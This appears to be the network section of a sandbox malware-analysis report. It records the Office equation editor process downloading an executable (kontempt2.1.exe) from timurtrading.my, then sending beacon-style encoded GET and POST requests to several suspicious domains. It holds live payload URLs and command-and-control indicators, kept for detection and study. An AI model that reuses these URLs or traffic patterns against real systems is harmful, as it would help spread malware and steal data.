Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443
Source: global trafficTCP traffic: 192.3.255.145:443 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.255.145:443

Networking

Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe DNS query: www.myprefpal.xyz
Source: Joe Sandbox View IP Address: 15.197.148.33
Source: Joe Sandbox View IP Address: 45.33.6.223
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0360189B URLDownloadToFileW, 2_2_0360189B
Source: global traffic HTTP traffic detected:
  HTTP/1.1 200 OK
  Connection: keep-alive
  Date: Tue, 22 Oct 2024 13:01:39 GMT
  Last-Modified: Sat, 12 Mar 2022 13:56:34 GMT
  Cache-Control: max-age=120
  ETag: "m622ca692s8a577"
  Content-type: application/zip; charset=utf-8
  Content-length: 566647
  Data Raw (continues on the next line and is truncated in the report; it begins with the zip local-file header 50 4b 03 04 and the entry name "sqlite3.def"): 50 4b 03 04 14 00 00 00 08 00 a6 12 57 54 f6 08 b2 ad 9e 06 00 00 c6 1c 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 a8 37 15 62 a8 37 15 62 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 85 98 c9 b2 dd 26 10 40 f7 fe 1b fb a5 5c f9 01 af 93 4a b2 c8 4e 85 24 24 e1 8b 40 66 b8 83 bf 3e cd 70 45 37 20 67 f5 1e a7 2f d0 b4 7a 82 6f ff fe f9 c7 5f ff fc fd c9 fe 90 c2 f1 8f 81 ad ab e1 2b 73 7c 98 b4 72 fc e9 ba 12 af 10 f7 4e 0f f0 43 ae ac d0 8a e0 3b 9b bc df 87 83 ad dc 9e 82 91 4d 37 7f 0c 8b 50 c2 6e 35 05 e8 6a 16 a6 d3 2d b3 c0 f0 9d c1 04 b5 d6 02 eb f8 51 98 50 f3 30 4a 3d b6 e4 eb 6f 94 cd da 8f 92 53 26 f0 be 19 d4 f3 94 97 92 92 83 19 b6 73 c7 4d 65 ac 4a 08 23 fe bc 12 2a f8 5b c9 34 6c ce 0d 85 e4 23 9d e4 f3 d7 96 d5 6a df 99 f4 d5 0e 3f b9 d1 ad ad de 14 2f 00 c3 61 7c 39 fc 61 03 9a a4 b6 9c 22 7d 70 45 89 e1 6c ae 49 fb ab 87 81 ff 0b f2 f6 35 6c 4c cd 12 1b 20 40 27 76 ae 7d b1 c1 c4 d4 c4 e5 85 5f 4e b0 c4 ca 57 a3 c1 4d d8 3c 5f 60 f0 20 b3 f7 64 33 97 bc 28 85 25 8a 3f 7a 18 14 3b 8a 6e ad 84 ec 34 24 b9 ad c7 c5 ee 19 70 37 b0 e3 90 af 0b dc 51 bf c8 ee 5f ae 25 17 13 21 15 4c cc 5d f1 eb 49 8b 14 53 67 1a 84 3e 93 e2 27 ef 48 6e e7 34 db 4a 85 ba 73 d3 59 2f f1 0b 35 9a ef 92 e0 b3 b3 8e 96 73 07 1e 2d 3b 6e 2d b3 8e f5 74 8b f8 42 b5 24 eb 7d 8f b7 a4 f2 0e c9 99 89 11 09 39 0f 39 09 09 b9 38 42 8b 82 41 a5 64 0e 42 00 4e cd 67 3e 5f 0a 50 ca 00 91 df 15 cd 9a 6f 46 62 1e c3 76 3e cd 7d 19 ce cc b1 91 81 8e 24 bf f5 84 ed 82 33 9f a4 7b 1d ed b4 cc 3b 33 68 4a cf 54 b4 6a d1 b4 9e 61 4f c5 be 66 da 88 55 f4 27 20 51 3b 0f 8e 2b fb a6 28 92 ce 2c 9c f3 11 eb fc b2 63 2d 9a f7 27 bd ef c2 0d 9b d6 37 cc 0e 21 21 27 47 f7 58 b9 bb 90 78 4b fc 69
3f 70 76 3c 01 d1 4a 2d 62 c5 c3 a0 f6 30 8f 39 b5 17 09 d4 88 d8 6a 64 1f bd 14 e0 c5 2b 11 89 82 24 5b 40 77 6a ec cc bd 9a 7a db bc 79 bb cb 5b d2 d9 64 d7 b3 6f 8f 92 68 e7 e7 0f 08 68 fd 68 55 38 63 21 28 3d e8 f1 3b 2f c9 34 0a ab f8 02 23 4e 6c da f8 22 3d 6a ac 02 a5 46 07 d2 98 a1 fd 00 40 76 ef 50 77 32 a7 ba ad 55 29 3b 89 41 56 02 25 77 be 6b 43 24 90 c4 9c 2f a9 22 c4 28 33 60 00 38 15 82 96 1b 41 aa c1 30 1b 7d 64 6b 95 d9 a0 6e 08 07 a9 d9 dc 69 36 b3 d4 6e b0 c1 9c ac 50 64 c6 4c 7a 26 e3 dd ae d5 10 7d 5f 00 da 0c 7a 59 2c 72 7b 80 90 8a cb f0 c9 27 34 38 c0 74 b0 2f 00 0c 85 41 c1 11 75 0e 3f 6a d4 79 0b 0c b7 5e 86 b2 39 a3 63 c7 4f 1f a2 c4 68 49 60 f8 7a a7 87 b4 92 ef da 1b 28 b2 ad e0 41 20 ad c3 c3 62 38 1d b4 8e 12 69 4c 4d 27 5a 43 03 01 cd 56 4a 24 15 7e 06 1d 09 ab 26 43 89 61 12 0e 3f e9 3b 6a ec e0 43 ce c3 c6 d9 31 48 01 8b a2 cc 1c 6e 08 95 c3 c4 a6 d8 f8 a3 ec 7d e3 af 87 86 15 c0 0f a6 5b 4b 49 d8 bc 29 39 a6 64 36 f4 15 36 f4 15 46 3f 44 f9 90 52 8c a0 28 f1 be 82 e0 26 b0 8f e8 1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\kontempt2.1[1].htm
Source: global traffic HTTP traffic detected:
  GET /kontempt2.1.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Connection: Keep-Alive
  Host: timurtrading.my
Source: global traffic HTTP traffic detected:
  GET /kontempt2.1.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: timurtrading.my
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
  GET /8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Ca HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.omnibizlux.biz
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global traffic HTTP traffic detected:
  GET /2022/sqlite-dll-win32-x86-3380000.zip HTTP/1.1
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
  Host: www.sqlite.org
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyx HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.75e296qdx.top
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global traffic HTTP traffic detected:
  GET /2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyx HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.myprefpal.xyz
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: global traffic HTTP traffic detected:
  GET /to3j/?2PV85pl=jApFr+7+PXCxj/MoVVJ1BrMCoCw62P1GtIxP7MFIoy+IcxCptQTIZicQXM85kXEn8fuuasCKCCy3E0AKuRzTVtyVct6lEvO/8mUZ63PGcSN9z9MVRwPD85QlGJnP&DtMH=kxoTeT1hyx HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.jilifish.win
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: timurtrading.my
Source: global traffic DNS traffic detected: DNS query: www.omnibizlux.biz
Source: global traffic DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic DNS traffic detected: DNS query: www.75e296qdx.top
Source: global traffic DNS traffic detected: DNS query: www.myprefpal.xyz
Source: global traffic DNS traffic detected: DNS query: www.jilifish.win
Source: unknown HTTP traffic detected:
  POST /quvp/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Cache-Control: no-cache
  Content-Length: 2164
  Host: www.75e296qdx.top
  Origin: http://www.75e296qdx.top
  Referer: http://www.75e296qdx.top/quvp/
  User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Tablet/ADR-1411061201) Presto/2.11.355 Version/12.10
  Data Raw (continues on the next line and is truncated in the report; the leading bytes 32 50 56 38 35 70 6c 3d decode to "2PV85pl=", the same parameter name the GET requests above carry in their query strings): 32 50 56 38 35 70 6c 3d 55 55 64 41 39 57 75 66 65 6e 46 41 52 57 58 6d 37 41 38 4a 69 66 77 39 31 4f 30 30 64 66 7a 77 6f 38 6d 6c 71 68 50 6e 73 4d 53 43 64 48 2b 50 38 64 43 54 37 54 43 37 6f 55 57 30 47 39 63 66 2f 4f 6c 59 4d 6d 58 37 61 4e 44 76 4e 53 34 4a 68 7a 49 6e 6d 46 72 69 46 68 4d 6c 55 35 61 6d 37 33 2f 52 62 56 5a 50 66 41 51 30 32 61 66 50 35 4c 30 52 62 68 6f 65 64 56 69 37 68 59 66 2f 42 78 64 55 34 48 2b 61 6f 75 33 75 56 34 6f 66 58 71 55 70 55 30 68 51 62 64 68 4a 79 73 31 43 5a 75 36 54 78 30 47 66 30 54 77 31 4f 4f 42 42 6a 6c 5a 38 64 36 54 31 6c 61 6f 78 4e 2b 62 62 65 50 4c 34 4f 4b 6f 39 59 75 63 30 32 5a 58 4a 67 6a 35 75 79 45 4a 64 7a 41 37 6b 31 33 47 73 73 75 77 78 38 48 47 6c 6d 4a 78 4e 79 55 43 51 77 59 41 78 4e 6c 6f 42 33 78 59 6a 2b 31 4c 4a 6d 37 66 78 76 6d 63 2b 49 32 57 44 4c 62 71 4d 71 78 41 4f 42 77 41 2f 48 6a 4c 35 63 6a 78 31 64 39 7a 56 51 71 50 41 63 34 76 41 7a 63 51 57 65 2b 68 78 75 61 63 70 53 62 30 79 4e 43 72 34 75 55 36 71 72 38 53 65 61 6d 79 45 4f 6b 73 74 30 4d 76 42 2b 61 63 77 44 41 59 34 44 6d 51 38 46 51 35 43 6d 2b 4b 45 33 6e 41 4d 52 4f 30 79 6a 33 4c 53 61 2b 72 45 46 34 64 77 54 46 46 44 70 47 76 2b 36 66 68 47 43 57 63 4a 7a 59 42 72 55 5a 4e 33 56 41 43 41 35 52 44 44 73 6b 79 5a 48 6b 39 74 42 51 43 4d 71 77 7a 32 6d 2b 63 76 63 4c 46 71 34 6b 34 45 36 6a 72 71 42 44 77 76 79 31 63 6d 33 6a 5a 67 36 50 64 6e 78 6c 57 35 44 6c 4b 39 34 79 71 4c 61 5a 4f 47 34 64 48 69 64 71 33 4c 65 71 50 43 67 56 30 49 72
58 67 44 4e 77 35 73 66 4b 6a 2f 6e 63 38 31 62 52 4e 53 79 55 64 50 76 2f 38 4f 35 78 58 4c 69 51 54 48 61 76 31 58 52 4a 53 4c 38 45 6f 68 48 53 54 42 59 6c 41 72 78 36 45 37 48 79 6c 31 31 38 43 38 6e 70 31 30 55 38 61 32 67 32 32 53 39 6c 6b 5a 35 53 70 57 2b 30 41 65 4c 44 38 79 64 6f 6a 46 57 5a 62 38 44 53 47 6f 30 7a 76 7a 55 53 4e 50 33 44 74 43 5a 41 33 74 6d 68 45 32 6d 45 53 42 72 55 73 4e 7a 4e 56 59 55 67 52 4c 41 56 43 62 62 33 6e 61 2b 31 6f 37 49 57 46 37 51 74 79 69 34 74 4c 33 52 4d 61 4d 62 53 4a 4c 66 41 61 39 4d 48 72 55 54 55 4b 54 62 71 68 47 38 63 37 64 63 39 6a 53 70 63 57 62 37 50 55 37 67 5a 4b 43 59 69 47 69 36 37 4b 37 4f 47 43 55 30 6e 57 2b 56 75 44 31 62 35 38 58 72 54 37 75 74 2b 58 6a 6e 6b 45 61 75 48 50 56 32 70 50 4d 55 58 39 6f 47 49 72 2f 79 64 55 35 59 53 4d 72 44 32 2f 75 68 61 6f 52 56 4d 50 79 68 45 54 74 71 41 57 63 76 2f 39 48 59 74 46 4e 51 35 31 57 73 44 6a 66 6c 72 51 57 50 6a 31 73 45 67 35 48 63 55 76 6f 76 38 36 32 48 48 4e 52 68 67 6c 69 2b 4b 41 4
Source: global traffic HTTP traffic detected (this response is logged twice, identically):
  HTTP/1.1 404 Not Found
  Server: nginx/1.26.1
  Date: Tue, 22 Oct 2024 13:01:34 GMT
  Content-Type: text/html
  Content-Length: 153
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>
Source: global traffic HTTP traffic detected (four responses with identical headers and body, dated 13:01:50, 13:01:50, 13:01:53 and 13:01:56 GMT):
  HTTP/1.1 404 Not Found
  server: openresty
  date: Tue, 22 Oct 2024 13:01:50 GMT
  content-type: text/html
  transfer-encoding: chunked
  x-powered-by: PHP/7.2.30
  content-encoding: gzip
  connection: close
  Data Raw (one chunk of 0x6E = 110 gzip bytes, then the terminating zero-length chunk): 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii (the report renders the compressed bytes as text; this is not decoded content): 6E(HML),I310Q/Qp/K&T";Ct@}4l"(/ 5(Y^f>5tc0
Source: global traffic HTTP traffic detected:
  HTTP/1.1 404 Not Found
  server: openresty
  date: Tue, 22 Oct 2024 13:01:58 GMT
  content-type: text/html
  content-length: 150
  x-powered-by: PHP/7.2.30
  connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory (each of the following was found in all four dumps; these are CRL and OCSP distribution points of public certificate authorities as embedded in X.509 certificates, and the trailing characters such as "0", "06" or "0%" are adjacent ASN.1 length bytes picked up by the string scan, not part of the URL):
  http://crl.comodoca.com/AAACertificateServices.crl06
  http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
  http://crl.entrust.net/2048ca.crl0
  http://crl.entrust.net/server1.crl0
  http://crl.globalsign.net/root-r2.crl0
  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
  http://ocsp.comodoca.com0
  http://ocsp.comodoca.com0%
  http://ocsp.comodoca.com0-
  http://ocsp.comodoca.com0/
  http://ocsp.comodoca.com05
  http://ocsp.entrust.net03
  http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://timurtrading.my/kontempt2.1.exe
